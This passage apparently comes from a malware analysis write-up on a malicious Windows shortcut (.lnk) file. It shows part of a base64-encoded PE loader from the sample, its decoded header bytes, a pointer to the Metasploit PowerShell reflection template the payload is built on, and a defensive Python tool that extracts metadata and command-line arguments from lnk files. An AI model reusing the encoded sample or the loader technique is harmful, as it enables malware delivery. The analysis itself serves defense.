AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABABAAAAAYAACAAAAAAAAAAAAAAAAAAAABAAEAAAAwAACAAAAAAAAAAAAAAAAAAAABAAAAAABIAAAAWEAAAFQCAAAAAAAAAAAAAFQCNAAAAFYAUwBfAFYARQBSAFMASQBPAE4AXwBJAE4ARgBPAAAAAAC9BO/+AAABAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAQAAAABAAAAAAAAAAAAAAAAAAAARAAAAAEAVgBhAHIARgBpAGwAZQBJAG4AZgBvAAAAAAAkAAQAAABUAHIAYQBuAHMAbABhAHQAaQBvAG4AAAAAAAAAsAS0AQAAAQBTAHQAcgBpAG4AZwBGAGkAbABlAEkAbgBmAG8AAACQAQAAAQAwADAAMAAwADAANABiADAAAAAsAAIAAQBGAGkAbABlAEQAZQBzAGMAcgBpAHAAdABpAG8AbgAAAAAAIAAAADAACAABAEYAaQBsAGUAVgBlAHIAcwBpAG8AbgAAAAAAMAAuADAALgAwAC4AMAAAAEAADwABAEkAbgB0AGUAcgBuAGEAbABOAGEAbQBlAAAAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlAAAAAAAoAAIAAQBMAGUAZwBhAGwAQwBvAHAAeQByAGkAZwBoAHQAAAAgAAAASAAPAAEATwByAGkAZwBpAG4AYQBsAEYAaQBsAGUAbgBhAG0AZQAAAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAAAAAANAAIAAEAUAByAG8AZAB1AGMAdABWAGUAcgBzAGkAbwBuAAAAMAAuADAALgAwAC4AMAAAADgACAABAEEAcwBzAGUAbQBiAGwAeQAgAFYAZQByAHMAaQBvAG4AAAAwAC4AMAAuADAALgAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAMAAAA0DgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
print(base64.b64decode(base64Enc))

b'MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00\xb8\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x0e\x1f\xba\x0e\x00\xb4\t\xcd!\xb8\x01L\xcd!This program cannot be run in DOS mode.\r\r\n$\x00\x00\x00\x00\x00\x00\x00PE\x00\x00L\x01\x03\x00\'\x0c\xadY\x00\x00\x00\x00\x00\x00\x00\x00\xe0\x00\x02\x01\x0b\x01\x08\x00\x00\n\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\xce(\x00\x00\x00 \x00\x00\x00@\x00\x00\x00\x00@\x00\x00 \x00\x00\x00\x02\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x03\x00@\x85\x00\x00\x10\x00\x00\x10\x00\x00\x00\x00\x10\x00\x00\x10\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00t(\x00\x00W\x00\x00\x00\x00@\x00\x00\xb0\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00`\x00\x00\x0c\x00\x00\x00\x00\x00\

As we can see from all the decoded code snippets, the PE executable is simply used to execute the first decoded base64 blob.<br>
For those who have been playing with PowerShell for quite some time, the first base64 blob is actually using [Matt Graeber's](https://twitter.com/mattifestation) template obfuscation in MSF - https://github.com/rapid7/metasploit-framework/blob/b206de77081069dd53b1f90f57bfaccd0ecbb0d8/data/templates/scripts/to_mem_pshreflection.ps1.template

The following is the codes which you can use to run as a standalone script on your system to analyse the malicious lnk file.


```python
#!/usr/bin/python

'''
    lnk information extractor - 
    by Jacob Soo Lead Re

    Requirements:
    https://github.com/libyal/liblnk

    Hashes for samples:
        ee1bb4094121de086f2bfa1de42f7e72e1fa7b3edae29b50e913803478f958bc
    
'''

__author__ = "Jacob Soo Lead Re"
__version__ = "0.1"

import os, sys, struct
import argparse
from sys import argv

try:
    import pylnk 
except ImportError:
    print("Please install liblnk from https://pypi.org/project/liblnk-python/")
    print("    pip install liblnk-python")

#---------------------------------------------------
# _log : Prints out logs for debug purposes
#---------------------------------------------------
def _log(s):
    print(s)

#-----------------------------------------------------------------------
# extract_info : This extracts the C&C information from the lnk file.
#-----------------------------------------------------------------------
def extract_info(lnkfile):
    try:
        _log("[*] Extracting information ...")
        hLink = pylnk.file()
        hLink.open(lnkfile)
        _log("[+] Drive Serial Number: {}".format(hLink.get_drive_serial_number()))
        _log("[+] File Creation Time: {}".format(hLink.get_file_creation_time()))
        _log("[+] File Modification Time: {}".format(hLink.get_file_modification_time()))
        _log("[+] File Access Time: {}".format(hLink.get_file_access_time()))
        _log("[+] Machine Identifier: {}".format(hLink.get_machine_identifier()))
        _log("[+] String Data: {}".format(hLink.get_command_line_arguments()))
    except Exception as exception:
        _log("[-] %s" % exception)

#-------------------------------------------------------------
# check_lnk_file : Shitty Check whether file is a lnk file.
#-------------------------------------------------------------
def check_lnk_file(lnk_file):
    bLnk = False
    try:
        if pylnk.check_file_signature(lnk_file):
            bLnk = True
        return bLnk
    except:
        return bLnk

#-------------------------------------------------------------
# logo : Ascii Logos like the 90s. :P
#-------------------------------------------------------------
def logo():
    print('\n')
    print(' ______     __  __     __     ______   ______        ______     ______     ______     __  __     ______     __   __   ')
    print('/\  ___\   /\ \_\ \   /\ \   /\__  _\ /\  ___\      /\  == \   /\  == \   /\  __ \   /\ \/ /    /\  ___\   /\ "-.\ \  ')
    print('\ \___  \  \ \  __ \  \ \ \  \/_/\ \/ \ \___  \     \ \  __<   \ \  __<   \ \ \/\ \  \ \  _"-.  \ \  __\   \ \ \-.  \ ')
    print(' \/\_____\  \ \_\ \_\  \ \_\    \ \_\  \/\_____\     \ \_____\  \ \_\ \_\  \ \_____\  \ \_\ \_\  \ \_____\  \ \_\\\\"\_\\')
    print('  \/_____/   \/_/\/_/   \/_/     \/_/   \/_____/      \/_____/   \/_/ /_/   \/_____/   \/_/\/_/   \/_____/   \/_/ \/_/')
    print('\n')
    print(" Grab the lnk information!")
    print(" Jacob Soo")
    print(" Copyright (c) 2017-2020\n")
                                                                                                                      

if __name__ == "__main__":
    description='lnk information Extraction tool'
    parser = argparse.ArgumentParser(description=description,
                                     epilog='--file and --directory are mutually exclusive')
    group = parser.add_mutually_exclusive_group(required=True)
    group.add_argument('-f','--file',action='store',nargs=1,dest='szFilename',help='filename',metavar="filename")
    group.add_argument('-d','--directory',action='store',nargs=1,dest='szDirectory',help='Location of directory.',metavar='directory')

    args = parser.parse_args()
    Filename = args.szFilename
    Directory = args.szDirectory
    is_file = False
    is_dir = False
    try:
        is_file = os.path.isfile(Filename[0])
    except:
        pass
    try:
        is_dir = os.path.isdir(Directory[0])
    except:
        pass
    logo()
    if Filename is not None and is_file:
        if check_lnk_file(Filename[0])==True:
            Filename = os.path.abspath(Filename[0])
            extract_info(Filename)
        else:
            print("This is not a valid .lnk file :{}".format(Filename[0]))
    if Directory is not None and is_dir:
        for root, directories, filenames in os.walk(Directory[0]):
            for filename in filenames: 
                szFile = os.path.join(root,filename) 
                if check_lnk_file(szFile)==True:
                    extract_info(szFile)
                else:
                    print("This is not a valid .lnk file : {}".format(szFile))
```

